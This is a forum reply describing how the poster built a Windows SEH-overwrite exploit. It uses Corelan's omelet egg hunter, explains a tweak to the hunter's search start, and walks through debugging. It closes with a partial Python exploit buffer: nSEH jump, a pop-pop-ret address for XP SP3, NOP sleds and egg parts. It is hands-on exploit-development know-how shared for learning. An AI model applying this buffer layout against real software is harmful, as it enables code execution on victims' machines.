Re: SEH Exploit and trouble with shellcode
Good point bolexx...no need not share. So here we go....
Dudeman pointed me to some real handy links that ultimately got me the answers that I need. Specifically this one: http://www.corelan.be/index.php/2010...ggs-to-omelet/
When you attach a debugger and trigger the exploit (SEH), you can see parts of your buffer in 2 areas on the current stack frame where you can house shell code. I split the shell code up into 3 123 byte sections, added the appropriate 4 byte tags and used Corelan's omlet hunter code (nasm to compile and their pvereadbin.pl to extract shellcode) to search for the eggs. Unfortunately it never found them....I needed to modify the omlet hunter code to use a different start position.
The omlet hunter code does this basically:
1. Makes EDI point to the bottom of the stack with a "or di, 0xffff"
2. copies that value to EDX
3. Calculates the start location that points to where the shellcode will be re-assembled at and puts this in EDI
4. Begins searching for the shellcode using EDX (which points to bottom of the stack frame) as the starting location
5. puts the tag to search for in EAX and compares the value at the location of EDX with EAX...when found exits the loop and copies the shellcode to the appropriate location.
6. Repeats for all eggs
7. Executes a JMP EDI to jump to start address of shellcode.
If you throw a "xor dx, 0xffff" right before step 4, you will set EDX to the top of the current stack frame (instead of the bottom of the stack frame) and be good to go.
When I was trouble shooting I set a series of breakpoints and stepped through the omelet hunter code...pretty cool to watch if I must say so myself. I basically set a breakpoint at the pop pop ret and f7'd until I hit the omlet hunter shellcode, then set a break point on the instruction right after the loop and hit f9 to get it through the loop. Examined the registers once it hit the break point then repeated. It was a great excersise in getting familiar with the asm and stepping through the shellcode with a debugger. Note omelet hunter code was 98 bytes without any nulls each part was 127 bytes.
The snippet from the final exploit looked like this:
junk = "\x42"*4
nseh = "\xeb\x06\x90\x90" #short jump back over seh
seh = "\x5b\x2f\x95\x73" #73952F5B pop, pop, ret d3dim700.dll xpsp3
nops = "\x90" * 16
shell = omlet + "\x90\x90" + part3 + ("\x60"*15603) + "\x90\x90" + part1 + "\x90\x90" + part2
buf = ("\x90" * (210000 - len(head+junk+nseh+seh+nops+shell)))